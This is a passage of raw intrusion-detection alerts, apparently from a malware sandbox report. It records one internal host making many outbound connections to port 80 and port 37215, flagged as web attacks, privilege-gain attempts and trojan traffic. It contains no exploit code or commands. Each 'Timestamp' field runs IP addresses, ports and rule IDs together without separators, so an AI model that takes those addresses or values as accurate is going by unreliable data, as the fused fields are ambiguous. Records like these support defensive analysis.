      Source Port:55714
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2363.32.147.23747406802025883 01/26/24-15:32:33.778960
      SID:2025883
      Source Port:47406
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23216.98.4.17555762802030092 01/26/24-15:32:09.658201
      SID:2030092
      Source Port:55762
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2313.32.123.22959494802030092 01/26/24-15:32:36.929487
      SID:2030092
      Source Port:59494
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2361.195.145.6556272802030092 01/26/24-15:32:21.950680
      SID:2030092
      Source Port:56272
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23109.104.144.9857384802025883 01/26/24-15:31:52.901761
      SID:2025883
      Source Port:57384
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23210.158.145.5749402802025883 01/26/24-15:32:28.374838
      SID:2025883
      Source Port:49402
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2394.122.206.13541076802030092 01/26/24-15:32:23.629118
      SID:2030092
      Source Port:41076
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2377.70.177.5053098802025883 01/26/24-15:31:41.363987
      SID:2025883
      Source Port:53098
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23124.223.6.12651710802025883 01/26/24-15:31:37.082198
      SID:2025883
      Source Port:51710
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2313.245.236.18635174802025883 01/26/24-15:31:33.077577
      SID:2025883
      Source Port:35174
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23179.53.181.4856590802025883 01/26/24-15:32:09.544723
      SID:2025883
      Source Port:56590
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23104.24.252.7356140802025883 01/26/24-15:31:01.089994
      SID:2025883
      Source Port:56140
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23212.107.17.5343562802030092 01/26/24-15:31:20.948534
      SID:2030092
      Source Port:43562
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2345.135.232.545120802030092 01/26/24-15:31:13.845208
      SID:2030092
      Source Port:45120
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2349.4.64.19534308802025883 01/26/24-15:32:47.774923
      SID:2025883
      Source Port:34308
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2334.160.251.13143950802025883 01/26/24-15:32:36.823697
      SID:2025883
      Source Port:43950
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23148.139.122.14443836802030092 01/26/24-15:31:43.859827
      SID:2030092
      Source Port:43836
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23124.223.6.12651710802030092 01/26/24-15:31:37.082198
      SID:2030092
      Source Port:51710
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2394.255.246.23957434802025883 01/26/24-15:32:18.340341
      SID:2025883
      Source Port:57434
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2392.204.202.2359382802025883 01/26/24-15:32:18.333463
      SID:2025883
      Source Port:59382
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23212.51.159.2051022802025883 01/26/24-15:31:49.555601
      SID:2025883
      Source Port:51022
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23167.82.11.16647000802025883 01/26/24-15:31:18.051241
      SID:2025883
      Source Port:47000
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2347.135.166.18335540802030092 01/26/24-15:31:52.672906
      SID:2030092
      Source Port:35540
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23167.71.50.3558148802025883 01/26/24-15:31:58.714447
      SID:2025883
      Source Port:58148
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2341.89.94.8436374802030092 01/26/24-15:32:34.782595
      SID:2030092
      Source Port:36374
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.235.205.3858374802030092 01/26/24-15:31:12.588509
      SID:2030092
      Source Port:58374
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.254.67.20558516372152835222 01/26/24-15:31:52.465785
      SID:2835222
      Source Port:58516
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23104.107.160.19948622802030092 01/26/24-15:31:52.877494
      SID:2030092
      Source Port:48622
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23185.16.89.24148104802030092 01/26/24-15:32:01.351918
      SID:2030092
      Source Port:48104
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2369.90.160.25452410802030092 01/26/24-15:31:23.708076
      SID:2030092
      Source Port:52410
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2352.56.104.8535924802030092 01/26/24-15:32:41.945134
      SID:2030092
      Source Port:35924
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23209.206.59.8743802802025883 01/26/24-15:32:18.540220
      SID:2025883
      Source Port:43802
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2346.21.77.21937442802025883 01/26/24-15:32:42.019949
      SID:2025883
      Source Port:37442
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23211.22.125.12247490802025883 01/26/24-15:33:00.860742
      SID:2025883
      Source Port:47490
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2366.228.50.1543950802030092 01/26/24-15:31:33.008718
      SID:2030092
      Source Port:43950
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23138.3.212.12138624802030092 01/26/24-15:32:23.948314
      SID:2030092
      Source Port:38624
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23154.213.118.5740188802025883 01/26/24-15:31:48.000339
      SID:2025883
      Source Port:40188
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.238.217.167.1952856802025883 01/26/24-15:32:04.936288
      SID:2025883
      Source Port:52856
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23156.241.109.11940828372152835222 01/26/24-15:32:18.664967
      SID:2835222
      Source Port:40828
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2323.194.56.7436204802025883 01/26/24-15:32:14.932098
      SID:2025883
      Source Port:36204
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2338.14.3.12152026802025883 01/26/24-15:32:49.343724
      SID:2025883
      Source Port:52026
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2395.216.144.14242362802025883 01/26/24-15:32:39.873221
      SID:2025883
      Source Port:42362
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23152.0.245.2048074802025883 01/26/24-15:32:50.653183
      SID:2025883
      Source Port:48074
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2344.205.91.11556454802025883 01/26/24-15:32:38.536898
      SID:2025883
      Source Port:56454
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2393.179.30.21356902802030092 01/26/24-15:32:15.908806
      SID:2030092
      Source Port:56902
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23162.215.114.25336810802025883 01/26/24-15:32:48.749852
      SID:2025883
      Source Port:36810
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23159.192.157.644384802025883 01/26/24-15:32:36.360354
      SID:2025883
      Source Port:44384
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2350.98.58.3954190802025883 01/26/24-15:31:53.687421
      SID:2025883
      Source Port:54190
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23154.82.120.2445632802025883 01/26/24-15:32:28.451268
      SID:2025883
      Source Port:45632
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23121.189.159.847844802030092 01/26/24-15:31:27.210827
      SID:2030092
      Source Port:47844
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23161.111.10.10048080802030092 01/26/24-15:31:33.835673
      SID:2030092
      Source Port:48080
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23120.46.144.12043272802025883 01/26/24-15:32:10.106479
      SID:2025883
      Source Port:43272
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23186.132.69.4933608802025883 01/26/24-15:32:01.710929
      SID:2025883
      Source Port:33608
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2318.66.93.4053630802025883 01/26/24-15:31:22.834753
      SID:2025883
      Source Port:53630
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2354.79.81.18745534802025883 01/26/24-15:31:44.904507
      SID:2025883
      Source Port:45534
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2351.89.136.11539608802030092 01/26/24-15:32:18.378722
      SID:2030092
      Source Port:39608
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23108.156.62.15748266802025883 01/26/24-15:31:04.249083
      SID:2025883
      Source Port:48266
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23156.224.143.2355066802030092 01/26/24-15:32:18.476218
      SID:2030092
      Source Port:55066
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23151.244.61.7554984802025883 01/26/24-15:32:41.876739
      SID:2025883
      Source Port:54984
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23171.236.63.23344144802030092 01/26/24-15:31:16.333458
      SID:2030092
      Source Port:44144
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23119.3.220.6855482802030092 01/26/24-15:32:38.736141
      SID:2030092
      Source Port:55482
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23210.243.112.15758784802030092 01/26/24-15:31:51.438281
      SID:2030092
      Source Port:58784
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23182.23.12.2637814802025883 01/26/24-15:32:19.158178
      SID:2025883
      Source Port:37814
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23223.6.157.951858802025883 01/26/24-15:32:36.362831
      SID:2025883
      Source Port:51858
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23213.29.44.22540388802025883 01/26/24-15:32:25.756351
      SID:2025883
      Source Port:40388
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2347.4.208.4636724802025883 01/26/24-15:31:58.730412
      SID:2025883
      Source Port:36724
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23156.254.95.21547626802030092 01/26/24-15:32:39.717819
      SID:2030092
      Source Port:47626
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.201.56.17747892802030092 01/26/24-15:33:01.783768
      SID:2030092
      Source Port:47892
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2343.248.169.5059858802025883 01/26/24-15:31:50.006489
      SID:2025883
      Source Port:59858
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2360.43.214.23137832802030092 01/26/24-15:31:51.435831
      SID:2030092
      Source Port:37832
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23201.0.234.4241126802030092 01/26/24-15:31:33.229715
      SID:2030092
      Source Port:41126
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2365.110.67.446906802025883 01/26/24-15:31:49.655535
      SID:2025883
      Source Port:46906
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23115.42.222.13148598802030092 01/26/24-15:31:14.039428
      SID:2030092
      Source Port:48598
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23162.155.183.19344666802025883 01/26/24-15:32:11.781834
      SID:2025883
      Source Port:44666
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23210.71.232.17739778802025883 01/26/24-15:31:21.012973
      SID:2025883
      Source Port:39778
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23128.199.1.7957134802025883 01/26/24-15:32:44.664038
      SID:2025883
      Source Port:57134
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2320.241.66.6740198802030092 01/26/24-15:32:15.705873
      SID:2030092
      Source Port:40198
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2372.21.26.10841576802030092 01/26/24-15:33:00.470464
      SID:2030092
      Source Port:41576
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2369.85.94.24653286802030092 01/26/24-15:31:13.711293
      SID:2030092
      Source Port:53286
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23120.53.232.13745462802025883 01/26/24-15:32:20.034063
      SID:2025883
      Source Port:45462
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23149.62.39.12557276802025883 01/26/24-15:32:32.482019
      SID:2025883
      Source Port:57276
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2334.199.210.5146056802025883 01/26/24-15:31:23.425405
      SID:2025883
      Source Port:46056
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23119.207.31.17746712802030092 01/26/24-15:31:41.495556
      SID:2030092
      Source Port:46712
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2313.91.138.12738430802025883 01/26/24-15:31:49.499486
      SID:2025883
      Source Port:38430
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23156.254.90.17758848372152829579 01/26/24-15:31:13.283422
      SID:2829579
      Source Port:58848
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23197.246.45.20139650372152835222 01/26/24-15:32:01.755054
      SID:2835222
      Source Port:39650
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23196.50.71.10142210802030092 01/26/24-15:32:25.635896
      SID:2030092
      Source Port:42210
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2350.118.154.12242678802030092 01/26/24-15:32:56.776146
      SID:2030092
      Source Port:42678
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23194.164.49.7760720802025883 01/26/24-15:32:58.944458
      SID:2025883
      Source Port:60720
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2347.103.45.3158052802025883 01/26/24-15:32:13.113446
      SID:2025883
      Source Port:58052
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23103.123.4.8037724802025883 01/26/24-15:31:20.789732
      SID:2025883
      Source Port:37724
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2331.136.62.4556840802030092 01/26/24-15:31:27.817809
      SID:2030092
      Source Port:56840
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2338.53.37.23046536802025883 01/26/24-15:32:47.324847
      SID:2025883
      Source Port:46536
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23167.114.61.3959674802025883 01/26/24-15:31:12.402679
      SID:2025883
      Source Port:59674
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23104.77.235.19258712802030092 01/26/24-15:31:41.620325
      SID:2030092
      Source Port:58712
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23191.101.131.2144710802030092 01/26/24-15:31:49.579489
      SID:2030092
      Source Port:44710
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.79.19.10349378802030092 01/26/24-15:31:26.735340
      SID:2030092
      Source Port:49378
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23217.92.132.15052322802025883 01/26/24-15:31:37.944780
      SID:2025883
      Source Port:52322
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2350.228.145.13334136802025883 01/26/24-15:32:35.806433
      SID:2025883
      Source Port:34136
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2338.47.144.16346026802025883 01/26/24-15:31:52.998716
      SID:2025883
      Source Port:46026
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.235.23.53.20254988802025883 01/26/24-15:31:58.910288
      SID:2025883
      Source Port:54988
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23211.149.134.21350172802030092 01/26/24-15:32:13.187329
      SID:2030092
      Source Port:50172
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23116.62.71.21539852802025883 01/26/24-15:32:01.559265
      SID:2025883
      Source Port:39852
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23164.42.149.25243066802030092 01/26/24-15:32:14.712104
      SID:2030092
      Source Port:43066
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23149.12.212.5233460802030092 01/26/24-15:31:35.603929
      SID:2030092
      Source Port:33460
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23184.24.189.6247104802030092 01/26/24-15:31:37.924300
      SID:2030092
      Source Port:47104
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2313.239.176.6832990802030092 01/26/24-15:31:49.632193
      SID:2030092
      Source Port:32990
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23163.15.153.10853606802030092 01/26/24-15:31:53.983415
      SID:2030092
      Source Port:53606
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.241.74.11249042372152835222 01/26/24-15:31:13.367598
      SID:2835222
      Source Port:49042
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2364.182.87.5945922802030092 01/26/24-15:31:13.719950
      SID:2030092
      Source Port:45922
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23102.219.77.14835116802025883 01/26/24-15:32:02.052414
      SID:2025883
      Source Port:35116
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23163.5.192.9652060802025883 01/26/24-15:32:41.706916
      SID:2025883
      Source Port:52060
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2365.1.219.12134742802025883 01/26/24-15:32:31.046646
      SID:2025883
      Source Port:34742
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.8.146.16960426802025883 01/26/24-15:31:19.034784
      SID:2025883
      Source Port:60426
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2374.57.213.2047822802025883 01/26/24-15:32:25.423381
      SID:2025883
      Source Port:47822
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23173.232.181.21650596802030092 01/26/24-15:32:11.559221
      SID:2030092
      Source Port:50596
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23181.117.207.4133702802030092 01/26/24-15:32:42.866946
      SID:2030092
      Source Port:33702
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2335.213.160.22451902802030092 01/26/24-15:32:57.098575
      SID:2030092
      Source Port:51902
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23208.106.233.17852066802030092 01/26/24-15:31:47.689173
      SID:2030092
      Source Port:52066
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2318.235.53.6041494802025883 01/26/24-15:32:06.564301
      SID:2025883
      Source Port:41494
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23104.17.247.18641598802030092 01/26/24-15:32:11.557512
      SID:2030092
      Source Port:41598
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2347.100.202.11756470802025883 01/26/24-15:32:45.243255
      SID:2025883
      Source Port:56470
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2320.253.71.232906802025883 01/26/24-15:32:49.944359
      SID:2025883
      Source Port:32906
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.192.184.1243988802025883 01/26/24-15:31:55.842282
      SID:2025883
      Source Port:43988
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23217.73.134.19745198802025883 01/26/24-15:31:04.288934
      SID:2025883
      Source Port:45198
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2366.45.251.8637802802025883 01/26/24-15:31:36.579696
      SID:2025883
      Source Port:37802
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23104.116.119.10733370802030092 01/26/24-15:32:18.744839
      SID:2030092
      Source Port:33370
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2351.132.35.11638754802025883 01/26/24-15:31:44.773755
      SID:2025883
      Source Port:38754
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2354.201.62.19056696802030092 01/26/24-15:31:23.776945
      SID:2030092
      Source Port:56696
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.223.101.13038824802025883 01/26/24-15:32:07.813353
      SID:2025883
      Source Port:38824
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23130.254.45.11260120802030092 01/26/24-15:31:41.456093
      SID:2030092
      Source Port:60120
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2396.16.22.25458896802025883 01/26/24-15:33:00.563016
      SID:2025883
      Source Port:58896
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2399.83.214.2360542802030092 01/26/24-15:31:41.398087
      SID:2030092
      Source Port:60542
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23103.21.224.21237054802030092 01/26/24-15:32:07.991335
      SID:2030092
      Source Port:37054
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2354.195.88.16833964802025883 01/26/24-15:31:27.050988
      SID:2025883
      Source Port:33964
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.65.32.13337420802025883 01/26/24-15:31:22.785357
      SID:2025883
      Source Port:37420
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23104.80.232.839126802025883 01/26/24-15:31:55.941031
      SID:2025883
      Source Port:39126
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2393.213.121.25459160802025883 01/26/24-15:31:04.539128
      SID:2025883
      Source Port:59160
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2388.157.120.5760410802030092 01/26/24-15:32:23.859066
      SID:2030092
      Source Port:60410
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2387.99.180.17049486802025883 01/26/24-15:32:47.668429
      SID:2025883
      Source Port:49486
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23104.68.14.17548588802030092 01/26/24-15:32:21.661776
      SID:2030092
      Source Port:48588
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23185.232.128.13349740802030092 01/26/24-15:32:01.702135
      SID:2030092
      Source Port:49740
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23100.40.152.3447214802030092 01/26/24-15:31:26.761872
      SID:2030092
      Source Port:47214
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.214.19.21236398802025883 01/26/24-15:32:58.676170
      SID:2025883
      Source Port:36398
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.196.168.19136054802025883 01/26/24-15:32:53.430651
      SID:2025883
      Source Port:36054
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.232.17.206.8348860802025883 01/26/24-15:32:40.082111
      SID:2025883
      Source Port:48860
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2350.19.0.15341852802025883 01/26/24-15:32:35.511583
      SID:2025883
      Source Port:41852
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2347.246.10.10051578802030092 01/26/24-15:32:18.896072
      SID:2030092
      Source Port:51578
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23184.50.79.2339916802030092 01/26/24-15:31:20.743260
      SID:2030092
      Source Port:39916
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.62.79.23948618802030092 01/26/24-15:32:07.603043
      SID:2030092
      Source Port:48618
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23187.192.184.22845648802030092 01/26/24-15:32:06.859488
      SID:2030092
      Source Port:45648
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23173.29.24.18733044802030092 01/26/24-15:31:43.748280
      SID:2030092
      Source Port:33044
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2352.142.126.8859246802025883 01/26/24-15:31:04.732287
      SID:2025883
      Source Port:59246
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2352.202.65.12952068802030092 01/26/24-15:31:37.817906
      SID:2030092
      Source Port:52068
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2338.53.62.16238764802025883 01/26/24-15:32:58.590976
      SID:2025883
      Source Port:38764
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
